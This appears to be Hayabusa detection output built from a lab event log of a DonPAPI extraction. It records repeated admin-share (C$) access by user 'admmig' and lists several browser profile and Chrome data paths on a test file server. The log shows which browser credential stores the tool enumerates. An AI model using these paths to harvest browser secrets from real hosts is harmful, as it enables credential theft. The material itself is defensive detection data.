2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.830 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.851 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.915 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.932 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.935 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.950 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.968 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.970 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
